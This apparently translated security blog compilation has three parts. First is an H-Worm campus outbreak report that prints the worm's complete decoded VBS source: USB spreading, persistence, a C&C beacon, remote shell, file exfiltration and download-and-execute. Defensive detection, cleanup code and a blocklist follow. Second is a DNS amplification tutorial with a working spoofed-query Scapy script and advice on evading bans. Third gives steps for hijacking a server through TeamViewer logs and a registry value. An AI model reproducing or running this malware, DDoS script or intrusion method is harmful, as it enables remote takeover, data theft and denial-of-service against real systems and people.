H-Worm Campus Outbreak Report

Background

It was reportedly brought back from abroad by a history teacher and then spread widely across campus; the public computers in the lecture halls and the library were hit hardest, and 360 was unable to remove the malicious script.

Sample Analysis

Sample name

fuck girlMagazines +18 (3).vbs

Category

Virus.Vbs.Crypt.C

Behaviour

On every removable drive (the script only handles drive type 1) it copies itself into the drive root, marks every file and folder in that root hidden+system, and drops a .lnk next to each one, named after the folder or after the part of the file name before the first dot. Each shortcut runs cmd.exe /c start <script> & start <original> & exit with the window hidden, so opening it launches the worm first and then the real file, and the user notices nothing. (On the lab machines the originals turned up under a hidden 360SANDBOX directory; the script itself does not move files, it only changes their attributes.)

Script source

Source file: fuck girlMagazines +18 (3)
After two rounds of Base64 decoding and undoing an ASCII-code substitution layer, we recovered the original script. (Thanks to RuanXingZhi for help with the decoding.)

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "mmoohhaammeedd.no-ip.biz"
port = 12
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
     osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1 
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
    set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
         .type = 1 
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
    end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
     .loadfromfile fileurl
     buffer = .read
     .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
    enumprocess = enumprocess & objitem.name & "|"
    enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

Reading the source shows this is a full-featured remote-control script: upload, download, a command shell and more.
Script author: houdini
C&C domain: mmoohhaammeedd.no-ip.biz
Listening port: 12
Infection signature: free dynamic-DNS domain + unusual port + POST to "/is-ready", with a User-Agent made of <|>-separated host details (see post() and information() above)
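
The check-in can be recognised on a proxy or IDS from three things visible in post() and information(): the POST paths, the <|> separator, and the fixed "plus" field. The following Python is an added example (not from the original post or from the FireEye write-up) that parses that beacon and applies it to a few constructed proxy log lines. The log line format, client addresses, computer names and AV string in the sample are made up; only the C&C host, port, paths and field order come from the script.

```python
import re
from urllib.parse import urlsplit

SPLITER = "<|>"   # spliter = "<" & "|" & ">" in the script

# Field order produced by information(): hwid, %computername%, %username%,
# OS caption, the literal "plus", AV product names, the usb-spreading marker.
BEACON_FIELDS = ("hwid", "computername", "username", "os", "tag", "antivirus", "usbspreading")

# Paths the script POSTs to: "/is-ready" on every loop, the others as replies to commands.
CHECKIN_PATHS = {"/is-ready", "/is-enum-driver", "/is-enum-faf", "/is-enum-process", "/is-cmd-shell"}
TRANSFER_PATHS = {"/is-sending", "/is-recving"}   # download()/upload(): followed by <|> and a file name


def parse_beacon_ua(user_agent):
    """Split the User-Agent that post() fills from information(); None if it is not one."""
    parts = user_agent.split(SPLITER)
    if len(parts) != len(BEACON_FIELDS) or parts[4] != "plus":
        return None
    return dict(zip(BEACON_FIELDS, parts))


def is_hworm_request(method, path, user_agent):
    """True for an H-Worm check-in, command result or file transfer."""
    if method.upper() != "POST":
        return False
    base = path.split(SPLITER, 1)[0]
    if base in CHECKIN_PATHS or base in TRANSFER_PATHS:
        return True
    return parse_beacon_ua(user_agent) is not None


def parse_c2_command(response_text):
    """Decode a controller reply the way the main loop does: cmd = split(response, spliter)."""
    parts = response_text.split(SPLITER)
    return parts[0], parts[1:]


# Constructed proxy log format used by this example: client_ip method url "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')


def scan_proxy_log(lines):
    """Return (client_ip, c2_host, beacon_fields_or_None) for every H-Worm-looking line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue
        client, method, url, ua = m.groups()
        parsed = urlsplit(url)
        if is_hworm_request(method, parsed.path, ua):
            hits.append((client, parsed.hostname, parse_beacon_ua(ua)))
    return hits


# Constructed sample lines; host name and port are the ones from the script's config.
SAMPLE_LOG = [
    '10.1.2.34 POST http://mmoohhaammeedd.no-ip.biz:12/is-ready "1A2B3C4D<|>LIB-PC07<|>student<|>Microsoft Windows 7 Ultimate <|>plus<|>Example Antivirus .<|>true - 2014/12/26"',
    '10.1.2.35 GET http://example.com/index.html "Mozilla/5.0"',
    '10.1.2.36 POST http://mmoohhaammeedd.no-ip.biz:12/is-recving<|>C:\\Users\\student\\Desktop\\grades.xls ""',
]
```

Matching on the path and the separator rather than on the domain matters: the domain list below changes with every campaign, the protocol does not.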

We also obtained the H-Worm controller: a polished interface, powerful, with self-update and uninstall built in.
Later (August 2016) we found that on 2016-07-01 360 had published a report on H-Worm ("H-WORM: a simple but active remote-control trojan") listing the following C&C server addresses; network administrators are advised to block them.

zzzch.zapto.org
ysf.no-ip.biz
ycemufkk6g.bounceme.net
xxx-xxx.no-ip.info
xkiller.no-ip.info
wach.no-ip.org
tariqalr.zapto.org
shagagy21.no-ip.biz
sexcam.3utilities.com
servecounterstrike.servecounterstrike.com
playgame.servecounterstrike.com
p-dark.zapto.org
nouna1985.no-ip.org
n0it.no-ip.org
mzab47.myq-see.com
modox.no-ip.org
mmoohhaammeedd.no-ip.biz
mlcrosoft.serveftp.com
microsoftupgrades.servehttp.com
microsoftsystem.sytes.net
micr0s0ftsoft.myftp.org
mda.no-ip.org
maroco.redirectme.net
maroco.myq-see.com
maroco.linkpc.net
man2010.no-ip.org
korom.zapto.org
koko.myftp.org
klonkino.no-ip.org
king.servemp3.com
herohero.no-ip.org
hacker20133.no-ip.org
googlechrome.servequake.com
g00gle.sytes.net
dzhacker15.no-ip.org
dz47.servehttp.com
dz47.myq-see.com
dz47.linkpc.net
dream7.no-ip.biz
diiimaria.zapto.org
desha10.no-ip.org
dataday3.no-ip.org
darkanony0501.no-ip.biz
cupidon.zapto.org
chrom.no-ip.info
bog5151.zapto.org
blackmind.redirectme.net
albertino.no-ip.info
adolf2013.sytes.net
adamdam.zapto.org

Remediation

The script itself spells out what has to be cleaned. On each infected machine: remove the Run value named after the script's base name under both HKCU and HKLM \Software\Microsoft\Windows\CurrentVersion\Run, delete the copies in the Startup folder and in %temp%, and remove the marker key HKLM\Software\<base name>. On each removable drive: delete the worm copy in the root, delete the decoy *.lnk files, and clear the hidden and system attributes on the real files and folders (attrib -s -h). Block mmoohhaammeedd.no-ip.biz and the other C&C names above at the resolver or firewall. Disabling Autorun.inf is still sensible, but note that this worm does not rely on autorun at all; it spreads because users click the shortcuts. Use a mainstream, up-to-date security product.
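
Since what the cleanup has to undo is written down in install() and upstart(), here is an added example (not the post's own tooling) that turns it into a cleanup plan for a removable drive: it finds the decoy .lnk files by the naming rule the worm uses, lists the hidden+system items to restore, and keeps the worm copy separate so it can be collected as a sample. plan_cleanup works on any platform from a list of (name, is_dir, attributes) tuples; read_root and apply_cleanup need Windows because they use Win32 file attributes. The file names in the test listing are constructed.

```python
import os

FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
WORM_ATTRS = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM   # file.attributes = 2+4 in install()


def decoy_name(name, is_dir):
    """Name of the shortcut the worm drops next to an item: folders get <name>.lnk,
    files get the part before the FIRST dot plus .lnk (split(file.name,".")(0))."""
    return name + ".lnk" if is_dir else name.split(".")[0] + ".lnk"


def plan_cleanup(entries, worm_script):
    """entries: (name, is_dir, attributes) for everything in a drive root.
    Returns (decoys_to_delete, items_to_unhide, worm_copies)."""
    unhide, expected = [], {}
    for name, is_dir, attrs in entries:
        low = name.lower()
        if low == worm_script.lower() or low.endswith(".lnk"):
            continue
        if attrs & WORM_ATTRS == WORM_ATTRS:          # hidden+system: set by the worm
            unhide.append(name)
            expected[decoy_name(name, is_dir).lower()] = name
    decoys = [n for n, _, _ in entries if n.lower() in expected]
    worm = [n for n, _, _ in entries if n.lower() == worm_script.lower()]
    return decoys, unhide, worm


def read_root(root):
    """Windows only: list a drive root together with its Win32 attributes."""
    return [(e.name, e.is_dir(), e.stat(follow_symlinks=False).st_file_attributes)
            for e in os.scandir(root)]


def apply_cleanup(root, plan):
    """Windows only. Deletes the decoys and un-hides the originals; the worm copy is
    left in place (still hidden) so it can be collected before it is removed."""
    import ctypes
    decoys, unhide, worm = plan
    k32 = ctypes.windll.kernel32
    for name in decoys:
        os.remove(os.path.join(root, name))
    for name in unhide:
        path = os.path.join(root, name)
        k32.SetFileAttributesW(path, k32.GetFileAttributesW(path) & ~WORM_ATTRS)
    return [os.path.join(root, n) for n in worm]


def persistence_artifacts(script_name):
    """Everything upstart() and instance() leave on the host, keyed off the script's base name."""
    stem = script_name.split(".")[0]
    run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + stem
    return ["HKCU\\" + run, "HKLM\\" + run, "HKLM\\Software\\" + stem,
            "%temp%\\" + script_name, "<Startup folder>\\" + script_name]
```

Usage on an infected stick: plan = plan_cleanup(read_root("E:\\"), "fuck girlMagazines +18 (3).vbs") followed by apply_cleanup("E:\\", plan). The decoy detection is by name and attributes, not by parsing the .lnk target, so a user's own shortcut whose stem happens to match a hidden sibling would also be removed; review the plan before applying it.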

References

[1]Fireeye – Now you see me H-Worm by Houdini

Postscript

2014/12/26 Post published
2014/12/** The school network centre said the problem could not be solved
2016/08/11 Content and script updated

DNS Amplification Attacks: Principle and Implementation

Principle

Ordinary DNS queries go over UDP port 53, so the source address is never verified. (By contrast, TCP's three-way handshake means a connection from a spoofed source never completes.)
If we forge a DNS query with src = '192.168.1.2' and dst = '192.168.1.1', then 192.168.1.1 sends its response to 192.168.1.2. By forging large numbers of such queries we can turn high-bandwidth DNS servers against the spoofed source.

Strictly speaking this is just a UDP flood; what makes DNS amplification more damaging is the amplification itself. A plain UDP flood is limited by the attacker's bandwidth, whereas a DNS amplification attack is limited by the DNS servers' bandwidth. (In this arrangement the DNS server is both the attacker and a victim.)

For example, we send a recursive DNS server a query of type ANY for a domain (64 bytes on the wire) and receive an 820-byte response. (Note the "Truncated, retrying in TCP mode" line in the output below: this resolver cut its UDP answer short and dig fetched the 820 bytes over TCP. A spoofed query only ever gets the UDP answer, so the usable amplification from this particular server is smaller than 820/64.)

# dig any isc.org @61.187.***.***
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> any isc.org @61.187.***.***
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<-
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 10

;; QUESTION SECTION:
;isc.org. IN ANY

;; ANSWER SECTION:
isc.org. 40 IN A 149.20.64.69
isc.org. 7030 IN NS sfba.sns-pb.isc.org.
isc.org. 7030 IN NS ord.sns-pb.isc.org.
isc.org. 7030 IN NS ns.isc.afilias-nst.info.
isc.org. 7030 IN NS ams.sns-pb.isc.org.
isc.org. 7030 IN SOA ns-int.isc.org. hostmaster.isc.org. 2015050900 7200 3600 24796800 3600
isc.org. 7030 IN MX 10 mx.pao1.isc.org.
isc.org. 7030 IN MX 10 mx.ams1.isc.org.
isc.org. 7030 IN TXT "v=spf1 a mx ip4:204.152.184.0/21 ip4:149.20.0.0/16 ip6:2001:04F8::0/32 ip6:2001:500:60::65/128 ~all"
isc.org. 7030 IN TXT "$Id: isc.org,v 1.1979 2015-05-04 19:31:54 jquale Exp $"
isc.org. 40 IN AAAA 2001:4f8:0:2::69
isc.org. 7030 IN NAPTR 20 0 "S" "SIP+D2U" "" _sip._udp.isc.org.
isc.org. 7030 IN SPF "v=spf1 a mx ip4:204.152.184.0/21 ip4:149.20.0.0/16 ip6:2001:04F8::0/32 ip6:2001:500:60::65/128 ~all"

;; ADDITIONAL SECTION:
sfba.sns-pb.isc.org. 7030 IN A 149.20.64.3
sfba.sns-pb.isc.org. 7030 IN AAAA 2001:4f8:0:2::19
ord.sns-pb.isc.org. 7030 IN A 199.6.0.30
ord.sns-pb.isc.org. 7030 IN AAAA 2001:500:71::30
ams.sns-pb.isc.org. 7030 IN A 199.6.1.30
ams.sns-pb.isc.org. 7030 IN AAAA 2001:500:60::30
mx.pao1.isc.org. 3430 IN A 149.20.64.53
mx.pao1.isc.org. 3430 IN AAAA 2001:4f8:0:2::2b
mx.ams1.isc.org. 3430 IN A 199.6.1.65
mx.ams1.isc.org. 3430 IN AAAA 2001:500:60::65

;; Query time: 12 msec
;; SERVER: 61.187.***.***#53(61.187.***.***)
;; WHEN: Sun May 10 10:03:15 2015
;; MSG SIZE rcvd: 820
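
To see where the 64 bytes come from and to measure a resolver's amplification yourself, here is an added Python example (not from the original post) that builds the query on the wire by hand: a 12-byte header, a 13-byte question for isc.org, and the 11-byte EDNS0 OPT record that dig sends by default make 36 bytes of DNS payload, plus 28 bytes of IPv4/UDP headers. measure() sends a genuine query from your own address, with no spoofing, so you can check how good a reflector a resolver you run would be; the resolver address and the name are parameters, nothing is hard-coded.

```python
import socket
import struct

QTYPE_A, QTYPE_ANY = 1, 255
IP_HDR, UDP_HDR = 20, 8            # IPv4 + UDP header bytes on top of the DNS payload


def encode_name(name):
    """'isc.org' -> b'\\x03isc\\x03org\\x00' (DNS label format, 9 bytes)."""
    out = b""
    for label in name.strip(".").split("."):
        out += struct.pack("B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype=QTYPE_ANY, txid=1, edns_size=None):
    """DNS query payload: 12-byte header, one question, optional EDNS0 OPT record.
    dig sends the OPT record by default; it is the extra 11 bytes in the 64-byte query."""
    arcount = 1 if edns_size else 0
    # ID, flags (only RD set -> 0x0100), QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
    payload = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, arcount)
    payload += encode_name(name) + struct.pack("!HH", qtype, 1)     # QCLASS IN
    if edns_size:
        # OPT RR: root name, TYPE 41, CLASS = advertised UDP payload size, TTL 0, RDLENGTH 0
        payload += b"\x00" + struct.pack("!HHIH", 41, edns_size, 0, 0)
    return payload


def parse_header(payload):
    """Header of a DNS message. TC set means the resolver cut the UDP answer short,
    which is what forced dig into TCP in the capture above."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    return {"id": txid, "truncated": bool(flags & 0x0200), "qdcount": qd,
            "ancount": an, "nscount": ns, "arcount": ar}


def wire_size(payload_len):
    """Bytes on the wire for a DNS payload carried in IPv4/UDP."""
    return IP_HDR + UDP_HDR + payload_len


def amplification_factor(query_payload_len, response_payload_len):
    """Bytes delivered to the spoofed source per byte the attacker sends, at IP level."""
    return wire_size(response_payload_len) / wire_size(query_payload_len)


def measure(resolver, name, qtype=QTYPE_ANY, edns_size=4096, timeout=3.0):
    """Send one genuine (non-spoofed) query and report (query_len, response_len, factor).
    Point it at resolvers you operate to see how useful they would be as reflectors."""
    query = build_query(name, qtype, edns_size=edns_size)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (resolver, 53))
        response, _ = s.recvfrom(65535)
    if parse_header(response)["truncated"]:
        print("UDP answer truncated: the reflected size is only", len(response), "bytes")
    return len(query), len(response), amplification_factor(len(query), len(response))
```

With the numbers from the capture, build_query("isc.org") with edns_size=4096 is 36 bytes of payload, 64 on the wire, and an 820-byte payload reply gives an IP-level factor of 848/64 = 13.25. Resolvers that truncate over UDP, or that have ANY disabled, come out much lower, which is exactly the check a resolver operator wants to run.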

Because DNS queries are normally connectionless UDP, an attacker who sends 1G of DNS query traffic with forged source addresses can in theory obtain more than 50G of UDP traffic and steer it at the target. For a botnet with tens of thousands of controlled hosts, generating several or even tens of gigabits of DNS query traffic is not difficult; there are more than ten million open recursive servers worldwide, usually on high-bandwidth links. If each DNS server is made to produce only 30M of response traffic (too much DNS traffic would be noticed by the administrator and could affect the server's normal operation), then only 10,000 servers are needed to reach the effect of a 300G DDoS attack.
(Shanghai Jiao Tong University Network and Information Center)

Impact

  • The host whose address was forged as src receives a flood of responses and stops responding
  • The abused DNS server itself may go down, and the upstream servers it recurses to may run out of resources

Choosing a domain

The larger the amplification factor, the more effective the attack, so we look for domains with many records to query, such as isc.org, GitHub.com, Google.com, Logdown.com, SourceForge.net. Widely used domains that may already be on resolvers' query whitelists, such as Baidu.com or Gov.cn, are also good choices.

Implementation

Python is easy to pick up and has a module for everything, so we use it. (Which is probably why so many exploits are written in Python.)

from scapy.all import IP, UDP, DNS, DNSQR, RandShort, send

a = IP(dst='', src='')                 # dst: the open resolver; src: the spoofed victim address
b = UDP(sport=RandShort(), dport=53)   # dport must be an int, not the string '53'
c = DNS(id=1, qr=0, opcode=0, tc=0, rd=1, qdcount=1, ancount=0, nscount=0, arcount=0)
c.qd = DNSQR(qname='domain', qtype=1, qclass=1)   # qtype=1 is A; see "Going further" for ANY
p = a/b/c
case = 1                               # number of queries to send
send(p, count=case)                    # raw sockets: must run as root

The src host then receives case DNS responses.

Going further

  • Following the DNS message format, try sending queries of type ANY
  • Try recursing through names under *.3322.org, *.oicp.net, *.eicp.net, *.xicp.net to avoid being banned

Commonly used DNS servers

OneDNS 112.124.47.27
OpenerDNS 42.120.21.30
aliDNS 223.5.5.5,223.6.6.6
114DNS 114.114.114.114,114.114.115.115
114DNS安全版 114.114.114.119,114.114.115.119
114DNS家庭版 114.114.114.110,114.114.115.110 (recommended)

Prevention

A New Pentest Angle Based on TeamViewer

Environment

Microsoft(R) Windows(R) Server 2003, Enterprise Edition 5.2.3790 Service Pack 2 Build 3790
Patch count: 358
Protection software: 360Safe, QQPCMgr
On an internal network; port 80 is forwarded through the router
Current privilege: SYSTEM
TeamViewer version: 8.0

Approach

Dropping a RAT was no longer an option: after a failed attempt half a month earlier, the administrator had changed user privileges and passwords. The administrator had also changed the default RDP port but, not knowing how to fix it, left it in a state where connections fail with "The session will be disconnected due to a protocol error, please reconnect to the remote server". Could TeamViewer serve as the entry point instead?

It can.

In \Program Files\TeamViewer\ there is a Logfile.log; download it and analyse it at leisure.
Starting from the bottom, look for the strings "From:" and "To:"; what follows each is a TeamViewer ID, either the current server's own or a client the server connected out to.
Open your own TeamViewer account and add that ID to it.

Then double-click to connect :) Some administrators choose "Log in with Windows credentials", in which case the goal is reached.
If not...

From a terminal run reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer\Version8" to list the values under that key.
Find the "Security_WinLogin" value; if it is absent, create it with "reg add". "1" allows administrators only, "2" allows all users; the type is REG_DWORD.
Kill TeamViewer, then restart it.

Done.
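
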